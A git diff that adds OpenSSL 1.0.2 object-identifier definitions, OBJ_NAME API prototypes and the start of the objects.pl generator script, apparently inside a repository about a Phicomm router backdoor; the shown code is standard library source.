+#  define LN_netscape_renewal_url         "Netscape Renewal Url"
+#  define NID_netscape_renewal_url        75
+#  define OBJ_netscape_renewal_url        OBJ_netscape_cert_extension,7L
+
+#  define SN_netscape_ca_policy_url       "nsCaPolicyUrl"
+#  define LN_netscape_ca_policy_url       "Netscape CA Policy Url"
+#  define NID_netscape_ca_policy_url      76
+#  define OBJ_netscape_ca_policy_url      OBJ_netscape_cert_extension,8L
+
+#  define SN_netscape_ssl_server_name     "nsSslServerName"
+#  define LN_netscape_ssl_server_name     "Netscape SSL Server Name"
+#  define NID_netscape_ssl_server_name    77
+#  define OBJ_netscape_ssl_server_name    OBJ_netscape_cert_extension,12L
+
+#  define SN_netscape_comment             "nsComment"
+#  define LN_netscape_comment             "Netscape Comment"
+#  define NID_netscape_comment            78
+#  define OBJ_netscape_comment            OBJ_netscape_cert_extension,13L
+
+#  define SN_netscape_cert_sequence       "nsCertSequence"
+#  define LN_netscape_cert_sequence       "Netscape Certificate Sequence"
+#  define NID_netscape_cert_sequence      79
+#  define OBJ_netscape_cert_sequence      OBJ_netscape_data_type,5L
+
+#  define SN_desx_cbc                     "DESX-CBC"
+#  define LN_desx_cbc                     "desx-cbc"
+#  define NID_desx_cbc                    80
+
+#  define SN_id_ce                        "id-ce"
+#  define NID_id_ce                       81
+#  define OBJ_id_ce                       2L,5L,29L
+
+#  define SN_subject_key_identifier       "subjectKeyIdentifier"
+#  define LN_subject_key_identifier       "X509v3 Subject Key Identifier"
+#  define NID_subject_key_identifier      82
+#  define OBJ_subject_key_identifier      OBJ_id_ce,14L
+
+#  define SN_key_usage                    "keyUsage"
+#  define LN_key_usage                    "X509v3 Key Usage"
+#  define NID_key_usage                   83
+#  define OBJ_key_usage                   OBJ_id_ce,15L
+
+#  define SN_private_key_usage_period     "privateKeyUsagePeriod"
+#  define LN_private_key_usage_period     "X509v3 Private Key Usage Period"
+#  define NID_private_key_usage_period    84
+#  define OBJ_private_key_usage_period    OBJ_id_ce,16L
+
+#  define SN_subject_alt_name             "subjectAltName"
+#  define LN_subject_alt_name             "X509v3 Subject Alternative Name"
+#  define NID_subject_alt_name            85
+#  define OBJ_subject_alt_name            OBJ_id_ce,17L
+
+#  define SN_issuer_alt_name              "issuerAltName"
+#  define LN_issuer_alt_name              "X509v3 Issuer Alternative Name"
+#  define NID_issuer_alt_name             86
+#  define OBJ_issuer_alt_name             OBJ_id_ce,18L
+
+#  define SN_basic_constraints            "basicConstraints"
+#  define LN_basic_constraints            "X509v3 Basic Constraints"
+#  define NID_basic_constraints           87
+#  define OBJ_basic_constraints           OBJ_id_ce,19L
+
+#  define SN_crl_number                   "crlNumber"
+#  define LN_crl_number                   "X509v3 CRL Number"
+#  define NID_crl_number                  88
+#  define OBJ_crl_number                  OBJ_id_ce,20L
+
+#  define SN_certificate_policies         "certificatePolicies"
+#  define LN_certificate_policies         "X509v3 Certificate Policies"
+#  define NID_certificate_policies        89
+#  define OBJ_certificate_policies        OBJ_id_ce,32L
+
+#  define SN_authority_key_identifier     "authorityKeyIdentifier"
+#  define LN_authority_key_identifier     "X509v3 Authority Key Identifier"
+#  define NID_authority_key_identifier    90
+#  define OBJ_authority_key_identifier    OBJ_id_ce,35L
+
+#  define SN_bf_cbc                       "BF-CBC"
+#  define LN_bf_cbc                       "bf-cbc"
+#  define NID_bf_cbc                      91
+#  define OBJ_bf_cbc                      1L,3L,6L,1L,4L,1L,3029L,1L,2L
+
+#  define SN_bf_ecb                       "BF-ECB"
+#  define LN_bf_ecb                       "bf-ecb"
+#  define NID_bf_ecb                      92
+
+#  define SN_bf_cfb64                     "BF-CFB"
+#  define LN_bf_cfb64                     "bf-cfb"
+#  define NID_bf_cfb64                    93
+
+#  define SN_bf_ofb64                     "BF-OFB"
+#  define LN_bf_ofb64                     "bf-ofb"
+#  define NID_bf_ofb64                    94
+
+#  define SN_mdc2                         "MDC2"
+#  define LN_mdc2                         "mdc2"
+#  define NID_mdc2                        95
+#  define OBJ_mdc2                        2L,5L,8L,3L,101L
+/* An alternative?                      1L,3L,14L,3L,2L,19L */
+
+#  define SN_mdc2WithRSA                  "RSA-MDC2"
+#  define LN_mdc2WithRSA                  "mdc2withRSA"
+#  define NID_mdc2WithRSA                 96
+#  define OBJ_mdc2WithRSA                 2L,5L,8L,3L,100L
+
+#  define SN_rc4_40                       "RC4-40"
+#  define LN_rc4_40                       "rc4-40"
+#  define NID_rc4_40                      97
+
+#  define SN_rc2_40_cbc                   "RC2-40-CBC"
+#  define LN_rc2_40_cbc                   "rc2-40-cbc"
+#  define NID_rc2_40_cbc                  98
+
+#  define SN_givenName                    "G"
+#  define LN_givenName                    "givenName"
+#  define NID_givenName                   99
+#  define OBJ_givenName                   OBJ_X509,42L
+
+#  define SN_surname                      "S"
+#  define LN_surname                      "surname"
+#  define NID_surname                     100
+#  define OBJ_surname                     OBJ_X509,4L
+
+#  define SN_initials                     "I"
+#  define LN_initials                     "initials"
+#  define NID_initials                    101
+#  define OBJ_initials                    OBJ_X509,43L
+
+#  define SN_uniqueIdentifier             "UID"
+#  define LN_uniqueIdentifier             "uniqueIdentifier"
+#  define NID_uniqueIdentifier            102
+#  define OBJ_uniqueIdentifier            OBJ_X509,45L
+
+#  define SN_crl_distribution_points      "crlDistributionPoints"
+#  define LN_crl_distribution_points      "X509v3 CRL Distribution Points"
+#  define NID_crl_distribution_points     103
+#  define OBJ_crl_distribution_points     OBJ_id_ce,31L
+
+#  define SN_md5WithRSA                   "RSA-NP-MD5"
+#  define LN_md5WithRSA                   "md5WithRSA"
+#  define NID_md5WithRSA                  104
+#  define OBJ_md5WithRSA                  OBJ_algorithm,3L
+
+#  define SN_serialNumber                 "SN"
+#  define LN_serialNumber                 "serialNumber"
+#  define NID_serialNumber                105
+#  define OBJ_serialNumber                OBJ_X509,5L
+
+#  define SN_title                        "T"
+#  define LN_title                        "title"
+#  define NID_title                       106
+#  define OBJ_title                       OBJ_X509,12L
+
+#  define SN_description                  "D"
+#  define LN_description                  "description"
+#  define NID_description                 107
+#  define OBJ_description                 OBJ_X509,13L
+
+/* CAST5 is CAST-128, I'm just sticking with the documentation */
+#  define SN_cast5_cbc                    "CAST5-CBC"
+#  define LN_cast5_cbc                    "cast5-cbc"
+#  define NID_cast5_cbc                   108
+#  define OBJ_cast5_cbc                   1L,2L,840L,113533L,7L,66L,10L
+
+#  define SN_cast5_ecb                    "CAST5-ECB"
+#  define LN_cast5_ecb                    "cast5-ecb"
+#  define NID_cast5_ecb                   109
+
+#  define SN_cast5_cfb64                  "CAST5-CFB"
+#  define LN_cast5_cfb64                  "cast5-cfb"
+#  define NID_cast5_cfb64                 110
+
+#  define SN_cast5_ofb64                  "CAST5-OFB"
+#  define LN_cast5_ofb64                  "cast5-ofb"
+#  define NID_cast5_ofb64                 111
+
+#  define LN_pbeWithMD5AndCast5_CBC       "pbeWithMD5AndCast5CBC"
+#  define NID_pbeWithMD5AndCast5_CBC      112
+#  define OBJ_pbeWithMD5AndCast5_CBC      1L,2L,840L,113533L,7L,66L,12L
+
+/*-
+ * This is one sun will soon be using :-(
+ * id-dsa-with-sha1 ID  ::= {
+ *   iso(1) member-body(2) us(840) x9-57 (10040) x9cm(4) 3 }
+ */
+#  define SN_dsaWithSHA1                  "DSA-SHA1"
+#  define LN_dsaWithSHA1                  "dsaWithSHA1"
+#  define NID_dsaWithSHA1                 113
+#  define OBJ_dsaWithSHA1                 1L,2L,840L,10040L,4L,3L
+
+#  define NID_md5_sha1                    114
+#  define SN_md5_sha1                     "MD5-SHA1"
+#  define LN_md5_sha1                     "md5-sha1"
+
+#  define SN_sha1WithRSA                  "RSA-SHA1-2"
+#  define LN_sha1WithRSA                  "sha1WithRSA"
+#  define NID_sha1WithRSA                 115
+#  define OBJ_sha1WithRSA                 OBJ_algorithm,29L
+
+#  define SN_dsa                          "DSA"
+#  define LN_dsa                          "dsaEncryption"
+#  define NID_dsa                         116
+#  define OBJ_dsa                         1L,2L,840L,10040L,4L,1L
+
+#  define SN_ripemd160                    "RIPEMD160"
+#  define LN_ripemd160                    "ripemd160"
+#  define NID_ripemd160                   117
+#  define OBJ_ripemd160                   1L,3L,36L,3L,2L,1L
+
+/*
+ * The name should actually be rsaSignatureWithripemd160, but I'm going to
+ * continue using the convention I'm using with the other ciphers
+ */
+#  define SN_ripemd160WithRSA             "RSA-RIPEMD160"
+#  define LN_ripemd160WithRSA             "ripemd160WithRSA"
+#  define NID_ripemd160WithRSA            119
+#  define OBJ_ripemd160WithRSA            1L,3L,36L,3L,3L,1L,2L
+
+/*-
+ * Taken from rfc2040
+ *  RC5_CBC_Parameters ::= SEQUENCE {
+ *      version           INTEGER (v1_0(16)),
+ *      rounds            INTEGER (8..127),
+ *      blockSizeInBits   INTEGER (64, 128),
+ *      iv                OCTET STRING OPTIONAL
+ *      }
+ */
+#  define SN_rc5_cbc                      "RC5-CBC"
+#  define LN_rc5_cbc                      "rc5-cbc"
+#  define NID_rc5_cbc                     120
+#  define OBJ_rc5_cbc                     OBJ_rsadsi,3L,8L
+
+#  define SN_rc5_ecb                      "RC5-ECB"
+#  define LN_rc5_ecb                      "rc5-ecb"
+#  define NID_rc5_ecb                     121
+
+#  define SN_rc5_cfb64                    "RC5-CFB"
+#  define LN_rc5_cfb64                    "rc5-cfb"
+#  define NID_rc5_cfb64                   122
+
+#  define SN_rc5_ofb64                    "RC5-OFB"
+#  define LN_rc5_ofb64                    "rc5-ofb"
+#  define NID_rc5_ofb64                   123
+
+#  define SN_rle_compression              "RLE"
+#  define LN_rle_compression              "run length compression"
+#  define NID_rle_compression             124
+#  define OBJ_rle_compression             1L,1L,1L,1L,666L,1L
+
+#  define SN_zlib_compression             "ZLIB"
+#  define LN_zlib_compression             "zlib compression"
+#  define NID_zlib_compression            125
+#  define OBJ_zlib_compression            1L,1L,1L,1L,666L,2L
+
+#  define SN_ext_key_usage                "extendedKeyUsage"
+#  define LN_ext_key_usage                "X509v3 Extended Key Usage"
+#  define NID_ext_key_usage               126
+#  define OBJ_ext_key_usage               OBJ_id_ce,37
+
+#  define SN_id_pkix                      "PKIX"
+#  define NID_id_pkix                     127
+#  define OBJ_id_pkix                     1L,3L,6L,1L,5L,5L,7L
+
+#  define SN_id_kp                        "id-kp"
+#  define NID_id_kp                       128
+#  define OBJ_id_kp                       OBJ_id_pkix,3L
+
+/* PKIX extended key usage OIDs */
+
+#  define SN_server_auth                  "serverAuth"
+#  define LN_server_auth                  "TLS Web Server Authentication"
+#  define NID_server_auth                 129
+#  define OBJ_server_auth                 OBJ_id_kp,1L
+
+#  define SN_client_auth                  "clientAuth"
+#  define LN_client_auth                  "TLS Web Client Authentication"
+#  define NID_client_auth                 130
+#  define OBJ_client_auth                 OBJ_id_kp,2L
+
+#  define SN_code_sign                    "codeSigning"
+#  define LN_code_sign                    "Code Signing"
+#  define NID_code_sign                   131
+#  define OBJ_code_sign                   OBJ_id_kp,3L
+
+#  define SN_email_protect                "emailProtection"
+#  define LN_email_protect                "E-mail Protection"
+#  define NID_email_protect               132
+#  define OBJ_email_protect               OBJ_id_kp,4L
+
+#  define SN_time_stamp                   "timeStamping"
+#  define LN_time_stamp                   "Time Stamping"
+#  define NID_time_stamp                  133
+#  define OBJ_time_stamp                  OBJ_id_kp,8L
+
+/* Additional extended key usage OIDs: Microsoft */
+
+#  define SN_ms_code_ind                  "msCodeInd"
+#  define LN_ms_code_ind                  "Microsoft Individual Code Signing"
+#  define NID_ms_code_ind                 134
+#  define OBJ_ms_code_ind                 1L,3L,6L,1L,4L,1L,311L,2L,1L,21L
+
+#  define SN_ms_code_com                  "msCodeCom"
+#  define LN_ms_code_com                  "Microsoft Commercial Code Signing"
+#  define NID_ms_code_com                 135
+#  define OBJ_ms_code_com                 1L,3L,6L,1L,4L,1L,311L,2L,1L,22L
+
+#  define SN_ms_ctl_sign                  "msCTLSign"
+#  define LN_ms_ctl_sign                  "Microsoft Trust List Signing"
+#  define NID_ms_ctl_sign                 136
+#  define OBJ_ms_ctl_sign                 1L,3L,6L,1L,4L,1L,311L,10L,3L,1L
+
+#  define SN_ms_sgc                       "msSGC"
+#  define LN_ms_sgc                       "Microsoft Server Gated Crypto"
+#  define NID_ms_sgc                      137
+#  define OBJ_ms_sgc                      1L,3L,6L,1L,4L,1L,311L,10L,3L,3L
+
+#  define SN_ms_efs                       "msEFS"
+#  define LN_ms_efs                       "Microsoft Encrypted File System"
+#  define NID_ms_efs                      138
+#  define OBJ_ms_efs                      1L,3L,6L,1L,4L,1L,311L,10L,3L,4L
+
+/* Additional usage: Netscape */
+
+#  define SN_ns_sgc                       "nsSGC"
+#  define LN_ns_sgc                       "Netscape Server Gated Crypto"
+#  define NID_ns_sgc                      139
+#  define OBJ_ns_sgc                      OBJ_netscape,4L,1L
+
+#  define SN_delta_crl                    "deltaCRL"
+#  define LN_delta_crl                    "X509v3 Delta CRL Indicator"
+#  define NID_delta_crl                   140
+#  define OBJ_delta_crl                   OBJ_id_ce,27L
+
+#  define SN_crl_reason                   "CRLReason"
+#  define LN_crl_reason                   "CRL Reason Code"
+#  define NID_crl_reason                  141
+#  define OBJ_crl_reason                  OBJ_id_ce,21L
+
+#  define SN_invalidity_date              "invalidityDate"
+#  define LN_invalidity_date              "Invalidity Date"
+#  define NID_invalidity_date             142
+#  define OBJ_invalidity_date             OBJ_id_ce,24L
+
+#  define SN_sxnet                        "SXNetID"
+#  define LN_sxnet                        "Strong Extranet ID"
+#  define NID_sxnet                       143
+#  define OBJ_sxnet                       1L,3L,101L,1L,4L,1L
+
+/* PKCS12 and related OBJECT IDENTIFIERS */
+
+#  define OBJ_pkcs12                      OBJ_pkcs,12L
+#  define OBJ_pkcs12_pbeids               OBJ_pkcs12, 1
+
+#  define SN_pbe_WithSHA1And128BitRC4     "PBE-SHA1-RC4-128"
+#  define LN_pbe_WithSHA1And128BitRC4     "pbeWithSHA1And128BitRC4"
+#  define NID_pbe_WithSHA1And128BitRC4    144
+#  define OBJ_pbe_WithSHA1And128BitRC4    OBJ_pkcs12_pbeids, 1L
+
+#  define SN_pbe_WithSHA1And40BitRC4      "PBE-SHA1-RC4-40"
+#  define LN_pbe_WithSHA1And40BitRC4      "pbeWithSHA1And40BitRC4"
+#  define NID_pbe_WithSHA1And40BitRC4     145
+#  define OBJ_pbe_WithSHA1And40BitRC4     OBJ_pkcs12_pbeids, 2L
+
+#  define SN_pbe_WithSHA1And3_Key_TripleDES_CBC   "PBE-SHA1-3DES"
+#  define LN_pbe_WithSHA1And3_Key_TripleDES_CBC   "pbeWithSHA1And3-KeyTripleDES-CBC"
+#  define NID_pbe_WithSHA1And3_Key_TripleDES_CBC  146
+#  define OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC  OBJ_pkcs12_pbeids, 3L
+
+#  define SN_pbe_WithSHA1And2_Key_TripleDES_CBC   "PBE-SHA1-2DES"
+#  define LN_pbe_WithSHA1And2_Key_TripleDES_CBC   "pbeWithSHA1And2-KeyTripleDES-CBC"
+#  define NID_pbe_WithSHA1And2_Key_TripleDES_CBC  147
+#  define OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC  OBJ_pkcs12_pbeids, 4L
+
+#  define SN_pbe_WithSHA1And128BitRC2_CBC         "PBE-SHA1-RC2-128"
+#  define LN_pbe_WithSHA1And128BitRC2_CBC         "pbeWithSHA1And128BitRC2-CBC"
+#  define NID_pbe_WithSHA1And128BitRC2_CBC        148
+#  define OBJ_pbe_WithSHA1And128BitRC2_CBC        OBJ_pkcs12_pbeids, 5L
+
+#  define SN_pbe_WithSHA1And40BitRC2_CBC  "PBE-SHA1-RC2-40"
+#  define LN_pbe_WithSHA1And40BitRC2_CBC  "pbeWithSHA1And40BitRC2-CBC"
+#  define NID_pbe_WithSHA1And40BitRC2_CBC 149
+#  define OBJ_pbe_WithSHA1And40BitRC2_CBC OBJ_pkcs12_pbeids, 6L
+
+#  define OBJ_pkcs12_Version1     OBJ_pkcs12, 10L
+
+#  define OBJ_pkcs12_BagIds       OBJ_pkcs12_Version1, 1L
+
+#  define LN_keyBag               "keyBag"
+#  define NID_keyBag              150
+#  define OBJ_keyBag              OBJ_pkcs12_BagIds, 1L
+
+#  define LN_pkcs8ShroudedKeyBag  "pkcs8ShroudedKeyBag"
+#  define NID_pkcs8ShroudedKeyBag 151
+#  define OBJ_pkcs8ShroudedKeyBag OBJ_pkcs12_BagIds, 2L
+
+#  define LN_certBag              "certBag"
+#  define NID_certBag             152
+#  define OBJ_certBag             OBJ_pkcs12_BagIds, 3L
+
+#  define LN_crlBag               "crlBag"
+#  define NID_crlBag              153
+#  define OBJ_crlBag              OBJ_pkcs12_BagIds, 4L
+
+#  define LN_secretBag            "secretBag"
+#  define NID_secretBag           154
+#  define OBJ_secretBag           OBJ_pkcs12_BagIds, 5L
+
+#  define LN_safeContentsBag      "safeContentsBag"
+#  define NID_safeContentsBag     155
+#  define OBJ_safeContentsBag     OBJ_pkcs12_BagIds, 6L
+
+#  define LN_friendlyName         "friendlyName"
+#  define NID_friendlyName        156
+#  define OBJ_friendlyName        OBJ_pkcs9, 20L
+
+#  define LN_localKeyID           "localKeyID"
+#  define NID_localKeyID          157
+#  define OBJ_localKeyID          OBJ_pkcs9, 21L
+
+#  define OBJ_certTypes           OBJ_pkcs9, 22L
+
+#  define LN_x509Certificate      "x509Certificate"
+#  define NID_x509Certificate     158
+#  define OBJ_x509Certificate     OBJ_certTypes, 1L
+
+#  define LN_sdsiCertificate      "sdsiCertificate"
+#  define NID_sdsiCertificate     159
+#  define OBJ_sdsiCertificate     OBJ_certTypes, 2L
+
+#  define OBJ_crlTypes            OBJ_pkcs9, 23L
+
+#  define LN_x509Crl              "x509Crl"
+#  define NID_x509Crl             160
+#  define OBJ_x509Crl             OBJ_crlTypes, 1L
+
+/* PKCS#5 v2 OIDs */
+
+#  define LN_pbes2                "PBES2"
+#  define NID_pbes2               161
+#  define OBJ_pbes2               OBJ_pkcs,5L,13L
+
+#  define LN_pbmac1               "PBMAC1"
+#  define NID_pbmac1              162
+#  define OBJ_pbmac1              OBJ_pkcs,5L,14L
+
+#  define LN_hmacWithSHA1         "hmacWithSHA1"
+#  define NID_hmacWithSHA1        163
+#  define OBJ_hmacWithSHA1        OBJ_rsadsi,2L,7L
+
+/* Policy Qualifier Ids */
+
+#  define LN_id_qt_cps            "Policy Qualifier CPS"
+#  define SN_id_qt_cps            "id-qt-cps"
+#  define NID_id_qt_cps           164
+#  define OBJ_id_qt_cps           OBJ_id_pkix,2L,1L
+
+#  define LN_id_qt_unotice        "Policy Qualifier User Notice"
+#  define SN_id_qt_unotice        "id-qt-unotice"
+#  define NID_id_qt_unotice       165
+#  define OBJ_id_qt_unotice       OBJ_id_pkix,2L,2L
+
+#  define SN_rc2_64_cbc                   "RC2-64-CBC"
+#  define LN_rc2_64_cbc                   "rc2-64-cbc"
+#  define NID_rc2_64_cbc                  166
+
+#  define SN_SMIMECapabilities            "SMIME-CAPS"
+#  define LN_SMIMECapabilities            "S/MIME Capabilities"
+#  define NID_SMIMECapabilities           167
+#  define OBJ_SMIMECapabilities           OBJ_pkcs9,15L
+
+#  define SN_pbeWithMD2AndRC2_CBC         "PBE-MD2-RC2-64"
+#  define LN_pbeWithMD2AndRC2_CBC         "pbeWithMD2AndRC2-CBC"
+#  define NID_pbeWithMD2AndRC2_CBC        168
+#  define OBJ_pbeWithMD2AndRC2_CBC        OBJ_pkcs,5L,4L
+
+#  define SN_pbeWithMD5AndRC2_CBC         "PBE-MD5-RC2-64"
+#  define LN_pbeWithMD5AndRC2_CBC         "pbeWithMD5AndRC2-CBC"
+#  define NID_pbeWithMD5AndRC2_CBC        169
+#  define OBJ_pbeWithMD5AndRC2_CBC        OBJ_pkcs,5L,6L
+
+#  define SN_pbeWithSHA1AndDES_CBC        "PBE-SHA1-DES"
+#  define LN_pbeWithSHA1AndDES_CBC        "pbeWithSHA1AndDES-CBC"
+#  define NID_pbeWithSHA1AndDES_CBC       170
+#  define OBJ_pbeWithSHA1AndDES_CBC       OBJ_pkcs,5L,10L
+
+/* Extension request OIDs */
+
+#  define LN_ms_ext_req                   "Microsoft Extension Request"
+#  define SN_ms_ext_req                   "msExtReq"
+#  define NID_ms_ext_req                  171
+#  define OBJ_ms_ext_req                  1L,3L,6L,1L,4L,1L,311L,2L,1L,14L
+
+#  define LN_ext_req                      "Extension Request"
+#  define SN_ext_req                      "extReq"
+#  define NID_ext_req                     172
+#  define OBJ_ext_req                     OBJ_pkcs9,14L
+
+#  define SN_name                         "name"
+#  define LN_name                         "name"
+#  define NID_name                        173
+#  define OBJ_name                        OBJ_X509,41L
+
+#  define SN_dnQualifier                  "dnQualifier"
+#  define LN_dnQualifier                  "dnQualifier"
+#  define NID_dnQualifier                 174
+#  define OBJ_dnQualifier                 OBJ_X509,46L
+
+#  define SN_id_pe                        "id-pe"
+#  define NID_id_pe                       175
+#  define OBJ_id_pe                       OBJ_id_pkix,1L
+
+#  define SN_id_ad                        "id-ad"
+#  define NID_id_ad                       176
+#  define OBJ_id_ad                       OBJ_id_pkix,48L
+
+#  define SN_info_access                  "authorityInfoAccess"
+#  define LN_info_access                  "Authority Information Access"
+#  define NID_info_access                 177
+#  define OBJ_info_access                 OBJ_id_pe,1L
+
+#  define SN_ad_OCSP                      "OCSP"
+#  define LN_ad_OCSP                      "OCSP"
+#  define NID_ad_OCSP                     178
+#  define OBJ_ad_OCSP                     OBJ_id_ad,1L
+
+#  define SN_ad_ca_issuers                "caIssuers"
+#  define LN_ad_ca_issuers                "CA Issuers"
+#  define NID_ad_ca_issuers               179
+#  define OBJ_ad_ca_issuers               OBJ_id_ad,2L
+
+#  define SN_OCSP_sign                    "OCSPSigning"
+#  define LN_OCSP_sign                    "OCSP Signing"
+#  define NID_OCSP_sign                   180
+#  define OBJ_OCSP_sign                   OBJ_id_kp,9L
+# endif                         /* USE_OBJ_MAC */
+
+# include <openssl/bio.h>
+# include <openssl/asn1.h>
+
+# define OBJ_NAME_TYPE_UNDEF             0x00
+# define OBJ_NAME_TYPE_MD_METH           0x01
+# define OBJ_NAME_TYPE_CIPHER_METH       0x02
+# define OBJ_NAME_TYPE_PKEY_METH         0x03
+# define OBJ_NAME_TYPE_COMP_METH         0x04
+# define OBJ_NAME_TYPE_NUM               0x05
+
+# define OBJ_NAME_ALIAS                  0x8000
+
+# define OBJ_BSEARCH_VALUE_ON_NOMATCH            0x01
+# define OBJ_BSEARCH_FIRST_VALUE_ON_MATCH        0x02
+
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct obj_name_st {
+    int type;
+    int alias;
+    const char *name;
+    const char *data;
+} OBJ_NAME;
+
+# define         OBJ_create_and_add_object(a,b,c) OBJ_create(a,b,c)
+
+int OBJ_NAME_init(void);
+int OBJ_NAME_new_index(unsigned long (*hash_func) (const char *),
+                       int (*cmp_func) (const char *, const char *),
+                       void (*free_func) (const char *, int, const char *));
+const char *OBJ_NAME_get(const char *name, int type);
+int OBJ_NAME_add(const char *name, int type, const char *data);
+int OBJ_NAME_remove(const char *name, int type);
+void OBJ_NAME_cleanup(int type); /* -1 for everything */
+void OBJ_NAME_do_all(int type, void (*fn) (const OBJ_NAME *, void *arg),
+                     void *arg);
+void OBJ_NAME_do_all_sorted(int type,
+                            void (*fn) (const OBJ_NAME *, void *arg),
+                            void *arg);
+
+ASN1_OBJECT *OBJ_dup(const ASN1_OBJECT *o);
+ASN1_OBJECT *OBJ_nid2obj(int n);
+const char *OBJ_nid2ln(int n);
+const char *OBJ_nid2sn(int n);
+int OBJ_obj2nid(const ASN1_OBJECT *o);
+ASN1_OBJECT *OBJ_txt2obj(const char *s, int no_name);
+int OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name);
+int OBJ_txt2nid(const char *s);
+int OBJ_ln2nid(const char *s);
+int OBJ_sn2nid(const char *s);
+int OBJ_cmp(const ASN1_OBJECT *a, const ASN1_OBJECT *b);
+const void *OBJ_bsearch_(const void *key, const void *base, int num, int size,
+                         int (*cmp) (const void *, const void *));
+const void *OBJ_bsearch_ex_(const void *key, const void *base, int num,
+                            int size,
+                            int (*cmp) (const void *, const void *),
+                            int flags);
+
+# define _DECLARE_OBJ_BSEARCH_CMP_FN(scope, type1, type2, nm)    \
+  static int nm##_cmp_BSEARCH_CMP_FN(const void *, const void *); \
+  static int nm##_cmp(type1 const *, type2 const *); \
+  scope type2 * OBJ_bsearch_##nm(type1 *key, type2 const *base, int num)
+
+# define DECLARE_OBJ_BSEARCH_CMP_FN(type1, type2, cmp)   \
+  _DECLARE_OBJ_BSEARCH_CMP_FN(static, type1, type2, cmp)
+# define DECLARE_OBJ_BSEARCH_GLOBAL_CMP_FN(type1, type2, nm)     \
+  type2 * OBJ_bsearch_##nm(type1 *key, type2 const *base, int num)
+
+/*-
+ * Unsolved problem: if a type is actually a pointer type, like
+ * nid_triple is, then its impossible to get a const where you need
+ * it. Consider:
+ *
+ * typedef int nid_triple[3];
+ * const void *a_;
+ * const nid_triple const *a = a_;
+ *
+ * The assignement discards a const because what you really want is:
+ *
+ * const int const * const *a = a_;
+ *
+ * But if you do that, you lose the fact that a is an array of 3 ints,
+ * which breaks comparison functions.
+ *
+ * Thus we end up having to cast, sadly, or unpack the
+ * declarations. Or, as I finally did in this case, delcare nid_triple
+ * to be a struct, which it should have been in the first place.
+ *
+ * Ben, August 2008.
+ *
+ * Also, strictly speaking not all types need be const, but handling
+ * the non-constness means a lot of complication, and in practice
+ * comparison routines do always not touch their arguments.
+ */
+
+# define IMPLEMENT_OBJ_BSEARCH_CMP_FN(type1, type2, nm)  \
+  static int nm##_cmp_BSEARCH_CMP_FN(const void *a_, const void *b_)    \
+      { \
+      type1 const *a = a_; \
+      type2 const *b = b_; \
+      return nm##_cmp(a,b); \
+      } \
+  static type2 *OBJ_bsearch_##nm(type1 *key, type2 const *base, int num) \
+      { \
+      return (type2 *)OBJ_bsearch_(key, base, num, sizeof(type2), \
+                                        nm##_cmp_BSEARCH_CMP_FN); \
+      } \
+      extern void dummy_prototype(void)
+
+# define IMPLEMENT_OBJ_BSEARCH_GLOBAL_CMP_FN(type1, type2, nm)   \
+  static int nm##_cmp_BSEARCH_CMP_FN(const void *a_, const void *b_)    \
+      { \
+      type1 const *a = a_; \
+      type2 const *b = b_; \
+      return nm##_cmp(a,b); \
+      } \
+  type2 *OBJ_bsearch_##nm(type1 *key, type2 const *base, int num) \
+      { \
+      return (type2 *)OBJ_bsearch_(key, base, num, sizeof(type2), \
+                                        nm##_cmp_BSEARCH_CMP_FN); \
+      } \
+      extern void dummy_prototype(void)
+
+# define OBJ_bsearch(type1,key,type2,base,num,cmp)                              \
+  ((type2 *)OBJ_bsearch_(CHECKED_PTR_OF(type1,key),CHECKED_PTR_OF(type2,base), \
+                         num,sizeof(type2),                             \
+                         ((void)CHECKED_PTR_OF(type1,cmp##_type_1),     \
+                          (void)CHECKED_PTR_OF(type2,cmp##_type_2),     \
+                          cmp##_BSEARCH_CMP_FN)))
+
+# define OBJ_bsearch_ex(type1,key,type2,base,num,cmp,flags)                      \
+  ((type2 *)OBJ_bsearch_ex_(CHECKED_PTR_OF(type1,key),CHECKED_PTR_OF(type2,base), \
+                         num,sizeof(type2),                             \
+                         ((void)CHECKED_PTR_OF(type1,cmp##_type_1),     \
+                          (void)type_2=CHECKED_PTR_OF(type2,cmp##_type_2), \
+                          cmp##_BSEARCH_CMP_FN)),flags)
+
+int OBJ_new_nid(int num);
+int OBJ_add_object(const ASN1_OBJECT *obj);
+int OBJ_create(const char *oid, const char *sn, const char *ln);
+void OBJ_cleanup(void);
+int OBJ_create_objects(BIO *in);
+
+int OBJ_find_sigid_algs(int signid, int *pdig_nid, int *ppkey_nid);
+int OBJ_find_sigid_by_algs(int *psignid, int dig_nid, int pkey_nid);
+int OBJ_add_sigid(int signid, int dig_id, int pkey_id);
+void OBJ_sigid_free(void);
+
+extern int obj_cleanup_defer;
+void check_defer(int nid);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_OBJ_strings(void);
+
+/* Error codes for the OBJ functions. */
+
+/* Function codes. */
+# define OBJ_F_OBJ_ADD_OBJECT                             105
+# define OBJ_F_OBJ_CREATE                                 100
+# define OBJ_F_OBJ_DUP                                    101
+# define OBJ_F_OBJ_NAME_NEW_INDEX                         106
+# define OBJ_F_OBJ_NID2LN                                 102
+# define OBJ_F_OBJ_NID2OBJ                                103
+# define OBJ_F_OBJ_NID2SN                                 104
+
+/* Reason codes. */
+# define OBJ_R_MALLOC_FAILURE                             100
+# define OBJ_R_UNKNOWN_NID                                101
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.pl
new file mode 100644
index 0000000..15c00bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.pl
@@ -0,0 +1,232 @@
+#!/usr/local/bin/perl
+
+open (NUMIN,"$ARGV[1]") || die "Can't open number file $ARGV[1]";
+$max_nid=0;
+$o=0;
+while(<NUMIN>)
+	{
+	chop;
+	$o++;
+	s/#.*$//;
+	next if /^\s*$/;
+	$_ = 'X'.$_;
+	($Cname,$mynum) = split;
+	$Cname =~ s/^X//;
+	if (defined($nidn{$mynum}))
+		{ die "$ARGV[1]:$o:There's already an object with NID ",$mynum," on line ",$order{$mynum},"\n"; }
+	if (defined($nid{$Cname}))
